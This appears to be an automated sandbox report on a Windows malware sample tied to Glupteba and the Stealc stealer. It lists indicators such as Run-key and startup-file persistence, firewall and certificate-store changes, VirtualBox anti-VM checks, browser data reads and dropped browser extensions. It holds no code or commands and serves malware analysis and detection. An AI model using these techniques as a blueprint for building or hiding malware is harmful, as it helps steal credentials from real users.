Analysis Overview
SHA256
d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4
Threat Level: Known bad
The file d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4 was found to be: Known bad.
Malicious Activity Summary
Modifies firewall policy service
Stealc
Glupteba
Glupteba payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Modifies Windows Firewall
Downloads MZ/PE file
Executes dropped EXE
Checks computer location settings
Drops startup file
UPX packed file
Checks BIOS information in registry
Loads dropped DLL
Reads user/profile data of web browsers
Drops Chrome extension
Drops desktop.ini file(s)
Legitimate hosting services abused for malware hosting/C2
Manipulates WinMonFS driver
Enumerates connected drives
Checks installed software on the system
Adds Run key to start application
Checks whether UAC is enabled
Looks up external IP address via web service
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in System32 directory
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
Unsigned PE
Program crash
Enumerates physical storage devices
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Enumerates system info in registry
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Checks SCSI registry key(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-19 14:04
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-19 14:04
Reported
2024-04-19 14:07
Platform
win10v2004-20240412-en
Max time kernel
150s
Max time network
152s
Signatures
Glupteba
Glupteba payload
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
Stealc
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LJbRIu2pCVXKEFdMDezjIokn.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uoV9nPqeelROzDnfhz31XMfB.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hRsEISclko0hAwcIoZnJshZC.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DG2z39swRqYzETAkX4aZiJaG.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zhc2O9UdJG2ERo97CDUIVDA0.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YorvLNmeO6cy0VDWYWpi1XCP.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wViCTUek5N8DiuvPF3ZYQ3ac.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Manipulates WinMonFS driver
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2156 set thread context of 2468 | N/A | C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\ByWuwrOBU\vAeHwP.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\RVqmAwyyxwiU2\YCfxMSe.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\ZWZyYuD.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\rYBRMvB.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\DUGaRsFaSnqjC\pbtbGil.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\ByWuwrOBU\WUGGbkD.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\RVqmAwyyxwiU2\pvwAWeNHfwRPL.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\DUGaRsFaSnqjC\aQbGfpM.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\ARTXeDTAxvUn\izroyMN.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\QhciBzJOokLnyYZub.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| File created | C:\Windows\Tasks\bWycNackLSywaqkmgR.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\BAnwxolbGpCzXNxkj.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\qbSDwEgyNYPZlGA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\ulc.0.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
